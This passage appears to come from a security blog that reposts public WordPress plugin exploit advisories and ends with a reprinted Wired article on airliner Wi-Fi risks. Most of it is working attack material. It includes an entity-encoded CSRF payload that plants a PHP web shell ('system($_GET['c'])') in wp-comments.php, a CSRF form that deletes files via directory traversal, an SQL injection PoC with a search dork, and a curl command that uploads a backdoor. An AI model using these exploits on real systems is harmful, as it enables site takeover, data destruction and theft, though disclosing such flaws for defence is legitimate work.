x61;&#x72;&#x61;&#x6d;&#x20;&#x69;&#x6e;&#x74;&#x20;&#x24;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x20;&#x50;&#x6f;&#x73;&#x74;&#x20;&#x49;&#x44;&#x2e;&#x0a;&#x09;&#x20;&#x2a;&#x2f;&#x0a;&#x09;&#x64;&#x6f;&#x5f;&#x61;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x28;&#x20;&#x27;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x63;&#x6c;&#x6f;&#x73;&#x65;&#x64;&#x27;&#x2c;&#x20;&#x24;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x20;&#x29;&#x3b;&#x0a;&#x09;&#x77;&#x70;&#x5f;&#x64;&#x69;&#x65;&#x28;&#x20;&#x5f;&#x5f;&#x28;&#x20;&#x27;&#x53;&#x6f;&#x72;&#x72;&#x79;&#x2c;&#x20;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x73;&#x20;&#x61;&#x72;&#x65;&#x20;&#x63;&#x6c;&#x6f;&#x73;&#x65;&#x64;&#x20;&#x66;&#x6f;&#x72;&#x20;&#x74;&#x68;&#x69;&#x73;&#x20;&#x69;&#x74;&#x65;&#x6d;&#x2e;&#x27;&#x20;&#x29;&#x2c;&#x20;&#x34;&#x30;&#x33;&#x20;&#x29;&#x3b;&#x0a;&#x7d;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x69;&#x66;&#x20;&#x28;&#x20;&#x27;&#x74;&#x72;&#x61;&#x73;&#x68;&#x27;&#x20;&#x3d;&#x3d;&#x20;&#x24;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x20;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x2f;&#x2a;&#x2a;&#x0a;&#x09;&#x20;&#x2a;&#x20;&#x46;&#x69;&#x72;&#x65;&#x73;&#x20;&#x77;&#x68;&#x65;&#x6e;&#x20;&#x61;&#x20;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x20;&#x69;&#x73;&#x20;&#x61;&#x74;&#x74;&#x65;&#x6d;&#x70;&#x74;&#x65;&#x64;&#x20;&#x6f;&#x6e;&#x20;&#x61;&#x20;&#x74;&#x72;&#x61;&#x73;&#x68;&#x65;&#x64;&#x20;&#x70;&#x6f;&#x73;&#x74;&#x2e;&#x0a;&#x09;&#x20;&#x2a;&#x0a;&#x09;&#x20;&#x2a;&#x20;&#x40;&#x73;&#x69;&#x6e;&#x63;&#x65;&#x20;&#x32;&#x2e;&#x39;&#x2e;&#x30;&#x0a;&#x09;&#x20;&#x2a;&#x0a;&#x09;&#x20;&#x2a;&#x20;&#x40;&#x70;&#x61;&#x72;&#x61;&#x6d;&#x20;&#x69;&#x6e;&#x74;&#x20;&#x24;&#x63;&#x6f;&#x6d;&#x6d;&#x65;&#x6e;&#x74;&#x5f;&#x70;&#x6f;&#x73;&#x74;&#x5f;&#x49;&#x44;&#x20;&#x50;&#x6f;&#x73;&#x74;&#x20;&#x49;&#x44;&#x2e;&#x0a;&#x09;&#x20;&#x2a;&#x2f;&#x3c;&#x3f;&#x70;&#x68;&#x70;&#x20;&#x73;&#x79;&#x73;&#x74;&#x65;&#x6d;&#x28;&#x24;&#x5f;&#x47;&#x45;&#x54;&#x5b;&#x27;&#x63;&#x27;&#x5d;&#x29;&#x3b;&#x20;&#x3f;&#x3e;&#x0a;&#x2f;&#x2a;&#x20;&#x46;&#x69;&#x6c;&#x6c;&#x65;&#x72;&#x20;&#x2a;&#x2f;&#x0a;&#x62;&#x79;&#x20;&#x4c;&#x69;&#x71;&#x75;&#x69;&#x64;&#x57;&#x6f;&#x72;&#x6d;&#x2c;&#x20;&#x32;&#x30;&#x31;&#x35;" />
      <input type="hidden" name="fname" value="wp-comments.php" />
    <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
 
---
 
http://localhost/wordpress/wp-comments.php?c=whoami

(29)

22Apr/150

WordPress MiwoFTP 1.0.5 Cross Site Request Forgery

WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit
 
 
Vendor: Miwisoft LLC
Product web page: http://www.miwisoft.com
Affected version: 1.0.5
 
Summary: MiwoFTP is a smart, fast and lightweight file manager
plugin that operates from the back-end of WordPress.
 
Desc: Input passed to the 'selitems[]' parameter is not properly
sanitised before being used to delete files. This can be exploited
to delete files with the permissions of the web server using directory
traversal sequences passed within the affected POST parameter.
 
Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21
 
 
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 
 
Advisory ID: ZSL-2015-5240
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5240.php
 
Vendor: http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog
 
 
24.03.2015
 
--
 
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=post" method="POST">
      <input type="hidden" name="do_action" value="delete" />
      <input type="hidden" name="first" value="y" />
      <input type="hidden" name="selitems[]" value="../../../../../pls_mr_jailer_dont_deleteme.txt" />
      <input type="submit" value="Gently" />
    </form>
  </body>
</html>

(37)

22Apr/150

WordPress Video Gallery 2.8 SQL Injection

######################
 
# Exploit Title : Wordpress Video Gallery 2.8 SQL Injection Vulnerabilitiey
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery
 
# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip
 
# Dork Google: inurl:/wp-admin/admin-ajax.php?action=googleadsense
 
 
# Date : 2015-04-04
 
# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox         
 
######################
 
# Description
 
 Wordpress Video Gallery 2.8 suffers from SQL injection
 
 
 Location file: /contus-video-gallery/hdflvvideoshare.php
 
 add_action('wp_ajax_googleadsense' ,'google_adsense');
 add_action('wp_ajax_nonpriv_googleadsense' ,'google_adsense');
 function google_adsense(){
     global $wpdb;
     $vid = $_GET['vid'];  
     $google_adsense_id =  $wpdb->get_var('SELECT google_adsense_value FROM '.$wpdb->prefix.'hdflvvideoshare WHERE vid ='.$vid);
     $query = $wpdb->get_var('SELECT googleadsense_details FROM '.$wpdb->prefix.'hdflvvideoshare_vgoogleadsense WHERE id='.$google_adsense_id);
     $google_adsense = unserialize($query);
     echo $google_adsense['googleadsense_code']; 
     die();
 
 $vid = $_GET['vid']; is not sanitized
 
######################
 
# PoC
 
 http://target/wp-admin/admin-ajax.php?action=googleadsense&vid=[SQLi]
 
 
######################
 
# Vulnerability Disclosure Timeline:
 
2015-04-04:  Discovered vulnerability
2015-04-06:  Vendor Notification
2015-04-06:  Vendor Response/Feedback 
2015-04-07:  Vendor Send Fix/Patch (same version number)
2015-04-13:  Public Disclosure 
 
#######################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
        http://ffhd.homelab.it (Free Fuzzy Hashes Database)
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################

(43)

22Apr/150

WordPress N-Media Website Contact Form 1.3.4 Shell Upload

######################
 
# Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability
 
# Exploit Author : Claudio Viviani
 
 
# Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
 
# Date : 2015-04-1
 
# Dork Google: index of website-contact-form-with-file-upload
               index of /uploads/contact_files/
 
# Tested on : Linux BackBox 4.0 / curl 7.35.0
 
#####################
 
# Info :  
 
 The "upload_file()" ajax function is affected from unrestircted file upload vulnerability.
 
 
######################
 
# PoC:
 
 curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" http://VICTIM/wp-admin/admin-ajax.php
 
 
 Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}
 
 
######################
 
# Backdoor Location:
 
 http://VICTIM/wp-content/uploads/contact_files/1427927588-backdoor.php
 
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
          http://ffhd.homelab.it (Free Fuzzy Hashes Database)
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################

(66)

17Apr/150

Hackers Could Commandeer New Planes Through Passenger Wi-Fi

Hackers Could Commandeer New Planes Through Passenger Wi-Fi

Seven years after the Federal Aviation Administration first warned Boeing that its new Dreamliner aircraft had a Wi-Fi design that made it vulnerable to hacking, a new government report suggests the passenger jets might still be vulnerable.

Boeing 787 Dreamliner jets, as well as Airbus A350 and A380 aircraft, have Wi-Fi passenger networks that use the same network as the avionics systems of the planes, raising the possibility that a hacker could hijack the navigation system or commandeer the plane through the in-plane network, according to the US Government Accountability Office, which released a report about the planes today.

A hacker would have to first bypass a firewall that separates the Wi-Fi system from the avionics system. But firewalls are not impenetrable, particularly if they are misconfigured. A better design, security experts have warned for years, is to air gap critical systems from non-critical ones—that is, physically separate the networks so that a hacker on the plane can’t bridge from one to the other, nor can a remote hacker pass malware through the internet connection to the plane’s avionics system. As the report notes, because the Wi-Fi systems in these planes connect to the world outside the plane, it opens the door for malicious actors to also remotely harm the plane’s system.

“A virus or malware planted in websites visited by passengers could provide an opportunity for a malicious attacker to access the IP-connected onboard information system through their infected machines,” according to the report.

Members of the House Transportation and Infrastructure Committee requested the report from the GAO out of growing concern that modern transportation systems, including planes, trains and automobiles, are becoming increasingly computerized and therefore susceptible to some of the same vulnerabilities and attacks that have long plagued desktop and laptop systems.

Boeing responded to the GAO report with a statement saying that a pilot manual override system would prevent someone from successfully commandeering its planes in this way.

This is not the first time the issue of aviation Wi-Fi security has come up for Boeing. In 2008, while Boeing was in the final stages of production on its new Dreamliner line of planes, the Federal Aviation Administration issued a report directing Boeing to address concerns about the passenger Wi-Fi system. The report was a “special conditions” document that the FAA produces whenever it encounters new aircraft designs and technologies that aren’t addressed by existing regulations and standards.

That report was pointing out the same problem that’s getting the company in trouble today. Boeing’s design for the Dreamliner’s Wi-Fi network, the FAA noted in the document, connected it to the plane’s control, navigation and communication systems, thereby establishing “new kinds of passenger connectivity to previously isolated data networks” that are critical to the safe operation of the plane. The FAA called on Boeing at the time to demonstrate that it had resolved this issue before the new line of planes could be put into service.

Boeing spokeswoman Lori Gunter told WIRED in 2008 that the company did indeed design a solution to address the FAA concerns. She wouldn’t go into detail about how Boeing was tackling the problem but said Boeing was employing a combination of solutions that involved some physical air-gapping of the networks as well as software firewalls. “There are places where the networks are not touching, and there are places where they are,” she had said.

Gunter added that although data could pass between the networks, “there are protections in place” to ensure that the passenger internet service didn’t access the maintenance data or the navigation system “under any circumstance.”

But security experts had warned at the time that software firewalls were still insufficient to separate critical networks from the Wi-Fi network.

It’s unclear if the authors of the new GAO report tested or examined Boeing’s solution and found it was still vulnerable to hacking or if they simply based their report on statements from experts that any design that doesn’t involve complete air-gapping of networks is vulnerable to hacking.

Boeing responded to the GAO report with a statement saying that “Boeing airplanes have more than one navigational system available to pilots” and that “[n]o changes to the flight plans loaded into the airplane systems can take place without pilot review and approval. In addition, other systems, multiple security measures, and flight deck operating procedures help ensure safe and secure airplane operations.”

Airbus also released a statement, which said only that it “constantly assesses and revisits the system architecture of our products, with an eye to establishing and maintaining the highest standards of safety and security. Beyond that, we don’t discuss design details or safeguards publicly, as such discussion might be counterproductive to security.”

Fonte: http://www.wired.com/2015/04/hackers-commandeer-new-planes-passenger-wi-fi/
(94)